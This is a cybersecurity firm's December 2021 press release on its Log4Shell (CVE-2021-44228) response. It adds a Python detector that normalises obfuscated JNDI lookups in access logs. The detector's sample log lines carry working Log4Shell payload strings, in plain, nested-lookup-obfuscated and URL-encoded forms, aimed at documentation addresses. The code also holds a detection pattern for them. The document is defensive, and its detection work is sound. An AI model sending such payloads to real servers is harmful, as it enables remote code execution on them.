Cybersecurity Firm SharkStriker Unveils its Detection and Mitigation Steps to Fight Log4j Vulnerability
Walnut Creek CA 94956, December 17, 2021: Log4j, a widely used Java logging library maintained by the Apache Software Foundation, was found to have a critical remote code execution vulnerability, CVE-2021-44228 (also known as Log4Shell). Because so many servers and applications use the library, major services such as Apple iCloud, Minecraft, Steam and Apache's own products were affected.
“The vulnerability is quoted to be highly critical and can impact countless servers. Hence, we recommend analyzing all the Log4j logs and any outbound requests made to the library,” says Mr. Kunal Popat, Co-Founder at SharkStriker. “Ensure you upgrade to the latest patch released by the Apache Software Foundation and implement detection, prevention, and mitigation rules per the Apache guidelines.”
The Log4j vulnerability is a major incident, described by several reputable public sources as the most critical to date. As a cybersecurity service provider, we are always on our toes to detect and counter such risks. As soon as our threat lab researchers picked up this vulnerability during their continuous threat hunting, SharkStriker's global security operations team began taking several steps to secure our own infrastructure and our partners' and customers' organizations.
- We assessed our own infrastructure to confirm that it is secure and protected, has a remediation plan, and is not exposed to the vulnerability, so that we do not become the path through which adversaries reach our partners.
- We crafted and deployed new detection and protection rules for our security tools and services, based on the thousands of automated attack attempts caught by our honeypot and on advice from the analyst community. These included:
- Since the exploit makes the vulnerable Java process fetch an attacker-supplied payload from a remote server (typically over LDAP, RMI, DNS or HTTP), we created rules to identify suspicious outbound traffic originating from a Java process.
- We documented all vulnerable library versions and their file hashes, and used them to create detection rules that alert on outbound traffic from hosts running those libraries to malicious IP addresses.
- We added IOCs identified by our honeypot and highlighted by analyst community feeds to our threat detection mechanism, enriching our threat intel feeds so that suspicious traffic is detected in real time.
- We sought to limit the panic by quickly issuing a security advisory to our partners and customers to raise awareness of the vulnerability. The advisory gave a brief overview of the Log4j vulnerability, the patches and workarounds available, and what our SOC team was doing to keep our partners' and customers' IT environments secure.
- We reached out to every customer that was vulnerable to the exploit to confirm that they had upgraded the affected applications and applied the recommended configuration changes.
- Finally, we published all the information about the vulnerability, including the background, impact, prevention measures and IOCs, in a blog post.
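The detection rules described above key on the `${jndi:...}` lookup string that the exploit plants in any logged field (User-Agent, request path, form parameters) and on the callback host it points at. Attackers obfuscate that string with nested lookups such as `${${lower:j}ndi:...}` and `${::-j}`, and URL-encode it in request paths, so a naive substring match misses most real attempts. The following is an added example, not SharkStriker's code or rules: it normalises the nested-lookup and URL-encoding tricks, then extracts the scheme, host and port of the callback server from web-server access logs, which doubles as an IOC feed. The log lines are constructed for the example and use RFC 5737 documentation addresses, not real indicators; the normaliser only handles the `lower:`, `upper:` and `:-` default-value lookups seen in the wild, which is an assumption about what is worth covering.

```python
"""Detect CVE-2021-44228 (Log4Shell) JNDI lookup strings in access logs.

Added example, not SharkStriker's code. Sample log lines are constructed
and use RFC 5737 documentation addresses rather than real indicators.
"""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: nothing nested inside the braces.
INNER = re.compile(r"\$\{([^${}]*)\}")

# A JNDI lookup after normalisation, capturing scheme, host and port.
JNDI = re.compile(
    r"\$\{\s*jndi:\s*(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|https?)://"
    r"(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def _collapse(expr: str):
    """Resolve one innermost lookup the way Log4j's StrSubstitutor does for
    the obfuscation tricks seen in the wild. Returns None for lookups we
    must not collapse (the jndi: lookup itself, or anything unknown)."""
    # ${env:NOPE:-j}, ${::-j}, ${sys:x:-n}: variable undefined, default used.
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    prefix, sep, rest = expr.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    return None


def normalize(payload: str) -> str:
    """Undo URL-encoding and nested-lookup obfuscation until nothing changes."""
    text = unquote(unquote(payload))  # double-encoded payloads are common

    def repl(m):
        r = _collapse(m.group(1))
        return m.group(0) if r is None else r

    while True:
        new = INNER.sub(repl, text)
        if new == text:
            return new
        text = new


def find_jndi(line: str):
    """Return [(scheme, host, port)] for every JNDI lookup in one log line."""
    return [
        (m["scheme"].lower(), m["host"], int(m["port"]) if m["port"] else None)
        for m in JNDI.finditer(normalize(line))
    ]


def scan(lines):
    """Scan combined-format access-log lines.

    Returns (alerts, callback_hosts): one alert dict per lookup found, and
    the sorted set of callback hosts to feed into outbound-traffic blocking."""
    alerts, hosts = [], set()
    for line in lines:
        src = line.split(" ", 1)[0]  # client address is the first field
        for scheme, host, port in find_jndi(line):
            alerts.append({"src": src, "scheme": scheme, "host": host,
                           "port": port, "line": line})
            hosts.add(host)
    return alerts, sorted(hosts)


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    # plain payload in the User-Agent header
    '198.51.100.7 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 '
    '"-" "${jndi:ldap://203.0.113.10:1389/a}"',
    # nested-lookup obfuscation of the "jndi" keyword
    '198.51.100.7 - - [10/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 612 '
    '"-" "${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:ldap://203.0.113.10:1389/b}"',
    # URL-encoded payload in the request path, RMI scheme
    '198.51.100.8 - - [10/Dec/2021:03:15:01 +0000] '
    '"GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.11%3A1099%2Fobj%7D HTTP/1.1" '
    '404 0 "-" "curl/7.79.1"',
    # benign request
    '192.0.2.5 - - [10/Dec/2021:03:15:30 +0000] "GET /index.html HTTP/1.1" 200 1043 '
    '"-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found, iocs = scan(SAMPLE_LOG)
    for a in found:
        print(f"{a['src']} -> {a['scheme']}://{a['host']}:{a['port']}")
    print("callback hosts:", iocs)
```

A scanner that ignores the string itself and only watches outbound connections is the complementary control: the Java process making an LDAP or RMI connection to an address it has never talked to before is the signal, regardless of how the payload was encoded. Neither check replaces patching; a match here means the payload reached a logger, not necessarily that it succeeded.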
Our team completed all of this within the first 24 hours of the exploit's public release. But we do not stop there: we know this is a continuous process, and we will keep taking every possible measure to secure our partners and customers.
SharkStriker is a comprehensive cybersecurity services provider based in the USA. We provide the full range of services needed to deploy 360° security. Our cybersecurity experts take pride in delivering robust security through our MDR platform, built on our ORCA philosophy. Short for Observe, Response, Compliance, and Awareness, ORCA covers all the major aspects of ensuring optimal security.
Learn more about SharkStriker at: https://sharkstriker.com/